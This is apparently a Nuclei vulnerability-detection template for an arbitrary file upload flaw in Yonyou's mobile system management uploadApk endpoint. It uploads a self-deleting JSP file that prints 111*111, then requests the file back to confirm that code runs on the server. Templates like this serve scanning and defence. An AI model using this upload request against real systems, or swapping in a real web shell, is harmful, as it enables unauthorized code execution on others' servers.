id: yonyou-mobile-uploadapk-fileupload

info:
  name: 用友移动系统管理 uploadApk 任意文件上传
  author: SleepingBag945
  severity: critical
  
variables:
  filename: "{{to_lower(rand_text_alpha(8))}}"
  boundary: "{{to_lower(rand_base(24))}}"


http:
  - raw:
      - |
        POST /maportal/appmanager/uploadApk.dopk_obj= HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Content-Type: multipart/form-data; boundary=----{{boundary}}
        
        ------{{boundary}}
        Content-Disposition: form-data; name="downloadpath"; filename="{{filename}}.jsp"
        Content-Type: application/msword
        
        <%
        {out.println(111*111);new java.io.File(application.getRealPath(request.getServletPath())).delete();}
        %>
        ------{{boundary}}--
        
      - |
        GET /maupload/apk/{{filename}}.jsp HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
        Connection: close
        

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body_2,"12321") && status_code_2 == 200'

     